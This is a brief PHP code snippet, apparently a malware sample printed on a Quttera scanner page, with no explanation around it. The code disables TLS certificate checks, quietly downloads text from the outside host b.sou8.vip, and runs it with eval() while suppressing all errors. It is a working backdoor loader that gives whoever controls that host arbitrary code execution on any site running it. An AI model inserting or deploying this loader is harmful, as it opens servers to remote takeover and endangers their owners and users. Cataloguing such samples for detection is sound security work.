$ctx=stream_context_create(array('http'=>array('timeout'=>30),'ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false)));
$b=@file_get_contents('https://b.sou8.vip/br/br.txt',false,$ctx);
if($b!==false&&$b!=''){
try{
print(eval("".$b.""));
}
catch(\Exception $e){
}
catch(\Throwable $e){
}
}
© 2023 Quttera Ltd. All rights reserved.